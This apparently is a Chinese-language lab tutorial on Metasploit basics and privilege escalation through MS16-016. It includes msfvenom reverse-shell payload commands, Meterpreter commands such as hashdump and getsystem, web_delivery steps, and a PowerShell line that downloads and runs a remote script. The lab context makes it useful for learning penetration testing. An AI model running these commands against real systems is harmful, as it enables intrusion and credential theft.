Metasploit基础

0x00:简介

Metasploit是一个漏洞利用框架,简称msf。是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击,,而且本身附带数百个已知软件漏洞的专业级漏洞攻击工具。是信息收集、漏洞扫描、权限提升、内网渗透等集成的工具。

msf一般会有四种接口对外提供,分别为


  • msfconsole
  • msfcli
  • msfgui
  • msfweb

0x01:模块

  • exploit
 利用程序,针对漏洞、权限进行利用

  • payload
用于在目标系统中运行任意命令或执行特定代码,主要用于shell获取

  • auxiliary
该模块包含了扫描、嗅探、指纹识别、网络协议欺骗等相关功能模块

  • encoder
该模块主要针对exploit模块进行代码免杀,以逃过杀毒软件、防火墙、ids等安全防护机制的检测

0x03:基础命令

search mysql #查找
use exploit/multi/handler #使用
info #查看信息
show exploits/payloads/options #显示可用信息
exploit/run #执行
exploit -j #后台运行
back #返回上一级
sessions -i #查看当前可用会话
sessions -K #杀死所有活跃会话

提权学习之旅——利用Metasploit提权_后台运行

getuid #获得运行Meterpreter会话的用户名,从而查看当前会话具有的权限
sysinfo #列出受控主机的系统信息
getprivs #尽可能多地获取目标主机上的特权
getsystem #通过各种攻击向量来提升到系统用户权限
hashdump #导出目标主机中的口令哈希值
screenshot #对目标主机的屏幕进行截图
background #将当前Meterpreter shell转为后台运行
quit #关闭当前Meterpreter会话,返回MSF终端
ps #显示所有运行进程以及关联的用户账户
migrate PID #迁移到一个指定的进程PID
execute -f cmd.exe -i# 执行从cmd.exe命令进行交互
shell #以所有可用令牌来运行一个交互的shell

生成exe程序

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f exe > shell.exe

生成php程序

msfvenom -p php/meterpreter_reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php

提权学习之旅——利用Metasploit提权_用户权限_02

反弹shell

exploit/multi/hander


  1. Msfvenom生成程序
  2. 使用handler执行exp
  3. 在目标机器运行Msfvenom生成程序
  4. 返回session

将刚才生成的shy.php上传至另外一台主机的Web目录,进行访问

提权学习之旅——利用Metasploit提权_机器运行_03

发现一个session已经传过来了

提权学习之旅——利用Metasploit提权_php_04

这便是一个简单的反弹shell的操作,如果要连接上只需执行如下命令即可

sessions -i 1

提权学习之旅——利用Metasploit提权_机器运行_05

使用​​background​​命令使其回到后台运行

提权学习之旅——利用Metasploit提权_机器运行_06

但是感觉连接的不是太稳定,容易出现超时状态。

exploit/multi/script/web_delivery


  1. 使用web_delivery返回脚本执行并加载exp
  2. 在目标机器运行脚本
  3. 返回session

先使用​​web_delivery​

use exploit/multi/script/web_delivery

其次查看下信息

提权学习之旅——利用Metasploit提权_用户权限_07

这里将targets设置为2,然后查找相应的payload进行设置

提权学习之旅——利用Metasploit提权_安全_08

设置好之后,设置需要的参数

提权学习之旅——利用Metasploit提权_机器运行_09

运行将下面的payload拿到目标机器中执行,反弹成功

提权学习之旅——利用Metasploit提权_php_10

这个方法相较于上一个稳定一点,这里就截一下目标机器的图片,测试一下

提权学习之旅——利用Metasploit提权_后台运行_11

提权学习之旅——利用Metasploit提权_用户权限_12

测试成功。

利用Metasploit提权

0x00:MS16-016漏洞简介

MS16-016(WebDAV特权提升漏洞),Microsoft Web分布式创作和版本管理(WebDAV)客户端验证输入不当,就会存在特权提升漏洞,成功利用此漏洞可以使用提升的特权执行任意代码

漏洞影响:

Windows Vista SP2
Windows Server 2008 x86 & x64
Windows Server 2008 R2 x64
Windows 7 x86 & x64
Windows 8.1 x86 & x64

环境准备:

win7 192.168.186.131
kail 192.168.186.134

还是先使用​​web_delivery​​进行反弹shell

提权学习之旅——利用Metasploit提权_安全_13

连接成功,查看当前用户

提权学习之旅——利用Metasploit提权_用户权限_14

接下来利用powershell远程下载Sherlock脚本并进行检测

powershell -nop -exec bypass -c "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1');Find-AllVulns" >shy.txt

发现存在MS16-016漏洞,直接使用msf搜索看是否有这个漏洞的exp

提权学习之旅——利用Metasploit提权_用户权限_15

使用一下,选择一下session

use exploit/windows/local/ms16_016_webdav

提权学习之旅——利用Metasploit提权_机器运行_16

进行攻击,即可提权到​​system​

总结

这次的学习简单的了解了Metasploit,以及相应的提权操作,继续学习,冲冲冲!